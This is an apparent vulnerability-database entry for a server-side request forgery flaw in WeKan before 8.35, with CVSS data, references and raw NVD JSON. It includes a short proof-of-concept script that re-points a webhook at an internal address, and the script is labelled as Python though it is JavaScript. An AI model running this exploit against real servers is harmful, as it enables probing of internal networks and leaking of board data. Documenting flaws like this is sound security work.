CVE-2026-41455

Description

WeKan before 8.35 contains a server-side request forgery vulnerability in webhook integration URL handling where the url schema field accepts any string without protocol restriction or destination validation. Attackers who can create or modify integrations can set webhook URLs to internal network addresses, causing the server to issue HTTP POST requests to attacker-controlled internal targets with full board event payloads, and can additionally exploit response handling to overwrite arbitrary comment text without authorization checks.

CVSS Details

CVSS Score

8.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N

Configurations (Affected Products)

No configuration data available.

WeKan < 8.35

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// PoC for WeKan SSRF (CVE-2026-41455)
// This script demonstrates how to update a webhook URL to point to an internal service.
// An attacker needs valid board edit permissions and an API token.

const fetch = require('node-fetch');

async function exploitSSRF(targetUrl, boardId, integrationId, apiToken) {
    // Construct the malicious internal URL
    const internalUrl = 'http://127.0.0.1:22'; // Attacker controlled internal target

    const headers = {
        'Authorization': `Bearer ${apiToken}`,
        'Content-Type': 'application/json'
    };

    const body = {
        'url': internalUrl,
        'isEnabled': true
    };

    try {
        const response = await fetch(`${targetUrl}/api/boards/${boardId}/integrations/${integrationId}`, {
            method: 'PUT',
            headers: headers,
            body: JSON.stringify(body)
        });

        if (response.ok) {
            console.log('[+] Webhook updated successfully. SSRF triggered on next board event.');
            console.log(`[+] Target set to: ${internalUrl}`);
        } else {
            console.log('[-] Failed to update webhook.');
        }
    } catch (error) {
        console.error('Error:', error);
    }
}

// Usage:
// exploitSSRF('http://target-wekan-url', 'BOARD_ID', 'INTEGRATION_ID', 'USER_API_TOKEN');

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-41455
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-41455
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-41455/
[4] VulDB https://vuldb.com/cve/CVE-2026-41455
[5] https://github.com/wekan/wekan/commit/2cd702f48df2b8aef0e7381685f8e089986a18a4
[6] https://github.com/wekan/wekan/releases/tag/v8.35
[7] https://www.vulncheck.com/advisories/wekan-ssrf-via-webhook-url

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-41455", "sourceIdentifier": "[email protected]", "published": "2026-04-22T22:16:32.677", "lastModified": "2026-04-23T16:27:11.540", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "WeKan before 8.35 contains a server-side request forgery vulnerability in webhook integration URL handling where the url schema field accepts any string without protocol restriction or destination validation. Attackers who can create or modify integrations can set webhook URLs to internal network addresses, causing the server to issue HTTP POST requests to attacker-controlled internal targets with full board event payloads, and can additionally exploit response handling to overwrite arbitrary comment text without authorization checks."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:H/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-918"}]}], "references": [{"url": "https://github.com/wekan/wekan/commit/2cd702f48df2b8aef0e7381685f8e089986a18a4", "source": "[email protected]"}, {"url": "https://github.com/wekan/wekan/releases/tag/v8.35", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/wekan-ssrf-via-webhook-url", "source": "[email protected]"}]}}